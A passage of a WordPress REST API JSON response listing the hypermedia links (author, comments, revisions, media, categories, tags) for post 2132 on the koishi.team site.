:[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/comments?post=2132"}],"version-history":[{"count":1,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/2132\/revisions"}],"predecessor-version":[{"id":2156,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/2132\/revisions\/2156"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media\/2157"}],"wp:attachment":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media?parent=2132"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/categories?post=2132"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/tags?post=2132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}